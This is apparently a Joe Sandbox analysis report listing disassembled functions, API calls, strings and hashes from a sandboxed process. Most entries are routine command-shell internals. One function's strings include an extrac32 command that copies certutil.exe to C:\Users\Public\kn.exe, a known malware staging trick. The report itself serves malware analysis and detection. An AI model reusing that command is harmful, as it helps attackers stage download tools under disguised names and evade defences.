                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: )$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1959970872-2167043656
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2acefbb671071955eacb54ce48438c50990f4fc274d57e168e29c17932e638dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C41AC69E0865F86FBA26B11E45437DB6A0BF01750FC64037C98B421B0DFBCA4898730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %04X-%04X$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 930873262-1938371929
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 479f350910c1d7edeb5b2b6a9a7a351206144802c38d22ce21a0ea5ed230f0e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25414B21A0CA8B82FB64AB60E4502BEF3A0EB88755FD04137DA5F436A5DFBCD545C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15236EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3249344982-2616576482
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d7d38d81121354050f916f34c4663a8d1a04ecee0d9816bd4e96b5d9d2e7dbd7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A415E72618B4A86F7509F12A84436DBAA4FB49BC4FC84276DA4A477B4CF7CD1148B10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1526A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526A73
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526A91
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526AB0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526AE3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526B01
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2770779731-632268628
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6d428d263f2126f0e5c8e7bd73756f6dfc38bb692bfa2ac7bc216d10df8e933b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C631DA22A09A5A85FB50AF12E45027DB6A0FB45F45BD581B6DA4E433A4EFBCA404C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3192234081-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8e331706f79744905255204283b9adad29570e0ef952b7666042d98a07ccae56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94318C32A0865BCBF754AF21A40427DFAA1BB89B90FC09135EA5B037B1CFBDD4018B10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1521630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521673
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152168D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521757
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152176E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521788
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152179C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Alloc$Size
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3586862581-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b25d85015698b8fd5004c13fe7897ec76e3a16acea9ed2acde6e18fcbf1eb1ca
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0916D62A09A5B81FB14AF15A49427DB6A0FB44B90FD98176DA4F837B0DFBCE441C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15286F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1313749407-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 487f39fc629e3016de51122b32d9271a89bd1cf49c2c42690b15f4d1d5844f41
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6851AF22B0968B42FB50BB51A8042BDE6D1BF55B90FD852B2DD5F477B0DFBCE4418260
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 920682188-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 19ecec929787481a0196fcf1cd43ad3c8af32e038fe7d0a2f6a70d27f14fc1da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7516E32705B8A8AEB21EF20D8542ECB7A1FB89B44F84817ACA4E47764DF7CD655C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7D151E00B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$FreeProcess_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 777023205-3344945345
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1bdac995618d11b27f14043194b29c8e1a40f2d0c8649583cb2f36e9b158937a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8511331919A4B8AFB52AF11A89417CF6A0EB497A0FD54437E94F422B1DFBCE490C630
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F1BA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F1E7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F2BB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: )$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1959970872-2167043656
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a0c4554c41beda40585ce88136b545e500ae19026640ab2254034f9f6367833b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1418A69E0861F86FBA67B15D95427DB6A0BF11740FD65037C98F421B4CFBCA4C98630
